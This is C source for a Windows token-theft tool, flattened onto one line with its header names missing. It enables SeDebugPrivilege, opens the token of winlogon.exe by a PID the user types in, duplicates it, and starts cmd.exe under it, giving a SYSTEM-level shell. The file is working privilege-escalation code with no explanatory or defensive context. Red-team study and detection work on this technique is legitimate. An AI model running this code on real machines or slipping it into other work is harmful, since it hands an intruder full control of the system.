#include #include BOOL EnableSeDebugPrivilege() { HANDLE hToken; TOKEN_PRIVILEGES tp; LUID luid; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE; if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) { CloseHandle(hToken); return FALSE; } getchar(); tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)) { CloseHandle(hToken); return FALSE; } CloseHandle(hToken); return TRUE; } int main() { DWORD pid; HANDLE hProcess, hToken, hDupToken; STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi = { 0 }; printf("Enter PID of winlogon.exe: "); scanf("%lu", &pid); printf("Get the pid\n"); getchar(); if (!EnableSeDebugPrivilege()) { printf("[-] Failed to enable SeDebugPrivilege\n"); return 1; } getchar(); //Opening the winlogon process hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); if (!hProcess) { printf("[-] Failed to open process. Error: %lu\n", GetLastError()); return 1; } // open the token of winlogon process if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken)) { printf("[-] Failed to open token. Error: %lu\n", GetLastError()); CloseHandle(hProcess); return 1; } // duplicate the token if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hDupToken)) { printf("[-] Failed to duplicate token. Error: %lu\n", GetLastError()); CloseHandle(hToken); CloseHandle(hProcess); return 1; } // create the cmd process with the duplicated token if (!CreateProcessWithTokenW(hDupToken, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &si, &pi)) { printf("[-] Failed to create process. Error: %lu\n", GetLastError()); } else { printf("[+] Process created successfully! with PID: %lu\n",pi.dwProcessId); } CloseHandle(hToken); CloseHandle(hDupToken); CloseHandle(hProcess); return 0; }